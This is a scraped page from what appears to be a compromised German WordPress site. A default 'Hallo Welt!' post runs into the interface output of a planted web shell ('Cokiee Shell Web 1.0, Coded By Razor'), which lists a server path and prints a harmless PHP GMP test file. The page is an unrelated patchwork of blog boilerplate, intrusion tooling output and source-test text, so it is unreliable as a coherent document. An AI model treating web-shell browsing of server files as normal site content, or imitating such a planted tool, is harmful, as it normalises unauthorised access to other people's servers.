Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/gmp/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/gmp/tests/bug69803.phpt |
--TEST-- Bug #69803: gmp_random_range() modifies second parameter if GMP number --FILE-- <?php $a = gmp_init(100); $b = gmp_init(200); echo $a . ", ", $b . "\n"; gmp_random_range($a, $b); echo $a . ", ", $b . "\n"; $b = gmp_init(200); echo $a . ", ", $b . "\n"; gmp_random_range(100, $b); echo $a . ", ", $b . "\n"; ?> --EXPECT-- 100, 200 100, 200 100, 200 100, 200
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare